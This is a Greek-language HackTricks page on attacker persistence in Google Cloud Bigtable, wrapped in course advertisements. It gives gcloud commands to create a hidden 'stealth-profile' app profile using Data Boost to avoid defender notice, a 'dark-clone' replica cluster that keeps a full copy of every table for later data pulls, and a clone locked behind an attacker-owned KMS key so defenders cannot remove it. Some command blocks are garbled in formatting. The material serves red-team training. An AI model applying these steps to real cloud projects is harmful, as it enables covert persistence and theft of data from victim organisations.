GCP - Bigtable Διατήρηση

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Bigtable

Για περισσότερες πληροφορίες σχετικά με το Bigtable δείτε:

GCP - Bigtable Enum

Αφιερωμένο attacker App Profile

Δικαιώματα: bigtable.appProfiles.create, bigtable.appProfiles.update.

Δημιουργήστε ένα app profile που δρομολογεί την κίνηση στο replica cluster σας και ενεργοποιήστε το Data Boost ώστε να μην εξαρτάστε ποτέ από provisioned nodes που μπορεί να παρατηρήσουν οι defenders.

Δημιουργήστε stealth app profile ```bash gcloud bigtable app-profiles create stealth-profile \ --instance= --route-any --restrict-to= \ --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile
–instance= –data-boost
–data-boost-compute-billing-owner=HOST_PAYS

</details>

Όσο αυτό το προφίλ υπάρχει, μπορείτε να επανασυνδεθείτε χρησιμοποιώντας νέα διαπιστευτήρια που το αναφέρουν.

### Διατήρηση του δικού σας replica cluster

**Δικαιώματα:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

Δημιουργήστε ένα cluster με ελάχιστο αριθμό κόμβων σε μια περιοχή με χαμηλή δραστηριότητα. Ακόμη κι αν οι ταυτότητες των clients σας εξαφανιστούν, **το cluster διατηρεί ένα πλήρες αντίγραφο κάθε πίνακα** μέχρι να το αφαιρέσουν ρητά οι αμυνόμενοι.

<details>

<summary>Δημιουργία replica cluster</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1

Παρακολούθησέ το μέσω gcloud bigtable clusters describe dark-clone --instance=<instance-id> ώστε να μπορείς να κλιμακώσεις άμεσα όταν χρειαστεί να τραβήξεις δεδομένα.

Κλείδωσε την αναπαραγωγή πίσω από το δικό σου CMEK

Δικαιώματα: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt στο attacker-owned key.

Χρησιμοποίησε το δικό σου KMS key όταν δημιουργείς ένα clone. Χωρίς αυτό το key, Google δεν μπορεί να επαναδημιουργήσει ή να κάνει fail over το cluster, οπότε οι blue teams πρέπει να συντονιστούν μαζί σου πριν το πειράξουν.

Δημιουργία cluster προστατευμένου με CMEK ```bash gcloud bigtable clusters create cmek-clone \ --instance= --zone=us-east4-b --num-nodes=1 \ --kms-key=projects//locations//keyRings//cryptoKeys/ ```

Περιστρέψτε ή απενεργοποιήστε το κλειδί στο project σας για να αχρηστεύσετε άμεσα τη replica (ενώ μπορείτε να την ενεργοποιήσετε ξανά αργότερα).

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks